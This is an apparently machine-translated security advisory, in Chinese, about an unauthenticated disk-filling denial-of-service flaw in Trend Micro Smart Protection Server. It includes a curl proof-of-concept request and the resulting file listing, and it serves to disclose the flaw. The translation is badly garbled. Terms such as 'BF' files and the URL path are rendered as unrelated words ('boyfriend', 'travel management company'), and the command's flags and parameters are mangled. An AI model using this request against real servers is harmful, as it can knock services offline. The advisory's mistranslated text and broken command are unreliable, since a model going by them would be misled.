(R1)趋势科技智能保护服务器拒绝服务

在调查cve - 2017 - 11398站得住脚的发现,一个新的拒绝服务向量在趋势科技智能保护服务器(TMSPS)。漏洞允许一个未经身份验证的远程攻击者创建“男朋友”文件在目标通过发送的HTTP请求http:// <目标> /差旅管理公司。创建的“男朋友”文件的形式有一个名字incdiff_ < older_version > _ <版本>和存储在/var/tmcss/pattern/ <版本>。每个文件大约是17个MB。攻击者可以填补远程目标磁盘通过发送大量的使用不同的HTTP请求< older_version >参数。

以下curl命令作为证据的概念:

curl - / tmp / incdiff_1712200300_1812200300”http:// < tmsps_host > /差旅管理公司/ ? OldBF = 1712200300 &newbf = 1712200300 '

在我们的测试主机的概念生成以下文件/var/tmcss/patterns/1812200300/:

(root@tmsps33b1064 1812200300) # ls - l incdiff * -rw-r - - - - - -。1 webserv webserv 17825852 3月2 00:18 incdiff_1712200300.1812200300